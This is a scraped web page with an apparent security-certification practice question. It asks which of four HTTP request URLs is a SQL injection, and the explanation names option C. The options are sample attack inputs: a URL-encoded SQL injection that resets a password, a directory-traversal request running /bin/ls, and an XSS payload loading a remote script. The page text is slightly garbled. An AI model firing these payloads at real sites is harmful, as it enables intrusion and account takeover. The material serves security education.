hown below:

Identify SQL injection attack from the HTTP requests shown below:

Identify SQL injection attack from the HTTP requests shown below:

A.
http://www.victim.com/example?accountnumber=67891&creditamount=999999999

B.
http://www.xsecurity.com/cgiin/bad.cgi?foo=..%fc%80%80%80%80%af../bin/ls%20-al

C.
http://www.myserver.com/search.asp?lname=smith%27%3bupdate%20usertable%20set%20pass wd%3d%27hAx0r%27%3b–%00

D.
http://www.myserver.com/script.php?mydata=%3cscript%20src=%22http%3a%2f%2fwww.yourser ver.c0m%2fbadscript.js%22% 3e%3c%2fscript%3e

Explanation:
Explantion: The correct answer contains the code to alter the usertable in order to change the password for user smith to hAx0r



Leave a Reply 1

Your email address will not be published. Required fields are marked *


Disputed;'Test

Disputed;'Test

Speaking of injection points…